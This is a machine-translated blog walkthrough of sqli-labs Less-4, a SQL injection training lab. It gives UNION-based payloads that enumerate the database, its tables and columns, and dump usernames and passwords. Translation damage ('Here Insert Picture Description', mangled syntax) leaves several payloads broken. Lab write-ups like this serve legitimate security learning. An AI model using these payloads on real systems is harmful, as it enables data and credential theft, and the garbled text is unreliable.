sqli-labs Less-4

Less-4 GET - Error based -Double Quotes - String
1.原页面Here Insert Picture Description
2.?id=1Here Insert Picture Description
3.?id=1’
Here Insert Picture Description
4.Here Insert Picture Description
‘ ‘’1\’’) LIMIT 0,1 ‘ --> ‘’1\’’) LIMIT 0,1
SQL:
Select login_name,password from admin where id =(“id”) limit 0,1

=. 1 5.id ") - + Here Insert Picture Description
6.?id=1") by 3- + Order Here Insert Picture Description
7. The version information database query
? ID = 0 "). 1 SELECT Union, Version (), 3- + Here Insert Picture Description
8. The database queries and username
? the above mentioned id = 0 ") of Union the SELECT 1, Database (), the user () - + Here Insert Picture Description
9. lookup table name
id = 0?") union select 1, (select group_concat (table_name) from information_schema.tables where table_schema = ' Security '), User () - +
Here Insert Picture Description
10. The column name query
id = 0 ") union select 1 , (select group_concat (column_name) from information_schema.columns where table_schema =?' security 'and table_name =' users'), 3- Here Insert Picture Description
11. queries the user name and password
? id = 0 ") union select 1, group_concat (username, 0x3a, password), 3 from users- +
Here Insert Picture Description

Published 15 original articles · won praise 2 · Views 300

Guess you like

Origin blog.csdn.net/qq_42630215/article/details/104698925